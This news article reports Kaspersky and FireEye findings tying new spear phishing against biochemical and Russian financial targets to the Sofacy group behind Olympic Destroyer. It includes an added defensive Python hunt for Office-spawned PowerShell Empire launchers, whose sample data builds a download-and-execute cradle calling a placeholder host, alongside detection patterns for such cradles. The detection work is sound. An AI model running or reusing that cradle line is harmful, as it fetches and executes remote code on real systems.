A wave of sophisticated spear phishing emails captured by Moscow-based Kaspersky Lab suggests that the same Russian-linked hacking group responsible for a historic cyberattack on the 2018 Winter Olympics is now targeting biochemical research and domestic financial organizations.
Dubbed “Sofacy,” “APT28” or “Fancy Bear” by security analysts, the attackers gained notoriety earlier this year when a destructive hacking tool aimed at the IT network attached to the Winter Olympics caught the attention of multiple intelligence agencies. That tool, known as “Olympic Destroyer,” allowed malware to spread within multiple confined IT environments, quickly deleting boot records and other forensic artifacts while simultaneously siphoning off sensitive user credentials.
CyberScoop previously reported that Sofacy had hacked into Atos, the 2018 Olympic Games’ primary IT provider, months before the event began.
One related phishing email that uses a booby-trapped Microsoft Word document explicitly mentions a biochemical threat research conference held in Switzerland, which is organized by Spiez Laboratory. Kaspersky noticed the lure being sent around last month. Other phishing emails incorporate fake letterheads associated with a Ukrainian government agency.
The Olympics attack became known for its use of so-called “false flags,” which injected a combination of technical attributes and techniques typically associated with an entirely different threat group in order to throw off investigators. At the time, Sofacy had been trying to pass off its operations as being carried out by North Korean hackers.
The latest findings by Kaspersky — a company facing its own geopolitical struggles — provide an incomplete but still notable window into Sofacy’s ongoing cyber-espionage efforts. The targeting of biochemical and Russian financial institutions coincides with simmering tensions between the Kremlin and the United Kingdom government, which blames Russia for attempting to murder a British citizen and his daughter.
Researchers said they were able to trace back the new phishing emails and prior OlympicDestroyer activity to Sofacy with “low to moderate confidence.”
While the newest, first-stage hacking attempts haven’t proven destructive just yet, the use of spear phishing to gain access to computers in France, Germany, Switzerland, Russia, and Ukraine has already set off alarm bells. In these cases, the malicious emails carry PowerShell Empire, an open-source penetration testing framework, inside attachments that, when clicked, begin to run scripts that call back to a remote attack server. The retrieved samples so far do not carry a final payload like Olympic Destroyer, although the two are associated.
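The attachment chain described above (an Office document launching a PowerShell Empire stager that calls back to a remote server) leaves a recognisable process-creation pattern that defenders can hunt for. The following is an added example, not code from the article or from Kaspersky; it assumes simplified Sysmon-style event fields and Empire’s default launcher flags, and the sample events and placeholder host are constructed.

```python
import re
import base64
from typing import Dict, List, Optional

# Empire's default launcher runs "powershell -noP -sta -w 1 -enc <base64>"; -enc carries
# base64 of UTF-16LE script text, so a defender can decode the stage and inspect it.
LAUNCHER_RE = re.compile(r"-nop\S*\s+-sta\s+-w\s+1\s+-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"Net\.WebClient|DownloadString|Invoke-Expression|\bIEX\b", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(b64: str) -> Optional[str]:
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_event(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Finding for an Office application spawning PowerShell, else None."""
    if basename(event["ParentImage"]) not in OFFICE_PARENTS or basename(event["Image"]) not in SHELLS:
        return None
    m = LAUNCHER_RE.search(event["CommandLine"])
    decoded = decode_encoded_command(m.group(1)) if m else None
    if decoded and CRADLE_RE.search(decoded):
        severity = "critical"  # Empire-style launcher that fetches its stage from a remote host
    elif m:
        severity = "high"      # Empire-style flags present but the payload did not decode
    else:
        severity = "medium"    # any Office-spawned PowerShell deserves a look
    return {"severity": severity, "parent": basename(event["ParentImage"]), "decoded": decoded or ""}

def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    return [f for f in (analyse_event(e) for e in events) if f]

# Constructed sample events (simplified Sysmon process-creation fields); the encoded command is
# built from a placeholder download cradle so it decodes the way a real -enc argument would.
_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/x')"
_ENC = base64.b64encode(_STAGE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -noP -sta -w 1 -enc {_ENC}"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -noP -sta -w 1 -enc QQBCAA=="},   # same flags, but not spawned by Office
    {"ParentImage": r"C:\Program Files\Microsoft Office\EXCEL.EXE", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},                                # Office child, but not PowerShell
]
```

Running `hunt(SAMPLE_EVENTS)` returns a single critical finding for the Word-spawned launcher, with the decoded stage attached for triage.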
“The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests,” Kaspersky’s Global Research & Analysis Team (GReAT) wrote. “This could also be a result of cyberattack outsourcing, which is not uncommon among nation state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’ attention.”
This would not be the first time that experts discovered a grey area between Russia’s financial and espionage-focused cyber operations.
Ben Read, a cyber-espionage analyst with cybersecurity firm FireEye, said that his firm has also been tracking the new Sofacy activity.
“We assess that the same actor who sent spear phishing emails to Olympic partners around January ahead of the event is behind these new lures,” Read said. “In the past, we’ve seen APT28 and APT29 [both Russian-linked hacking teams] reuse CNE (computer network exploitation) tools for not just foreign espionage, but domestic security purposes. For example, we saw APT28 target Pussy Riot … That could possibly explain the dual targeting of Russian banks and these other things.”
In a company blog post, Kaspersky said it is coming forward with the limited but important findings because of the potential that these intrusions could escalate into more damaging incidents, similar to what occurred in South Korea.
“Our research indicates that the group behind the Olympic Destroyer attack is actually a resourceful actor, which continues to be active,” said Costin Raiu, head of GReAT. “Without doubt, the Olympic Destroyer attack from February was carefully planned for months, from the initial access to the moment the wiper malware was deployed … the attacker is very agile and creative, with a focus on operational security while sitting somewhere in the middle when it comes to skills and access to custom tools.”
“We’ve seen the destructive attacks against Aramco and other companies in the Middle East (Shamoon, Shamoon 2), the BlackEnergy attacks against Ukraine’s power grid and the NotPetya attacks, among others, which had a serious impact on businesses worldwide,” Raiu said. “Therefore, evidence of continued activity from an actor which launches destructive attacks is a major reason for concern.”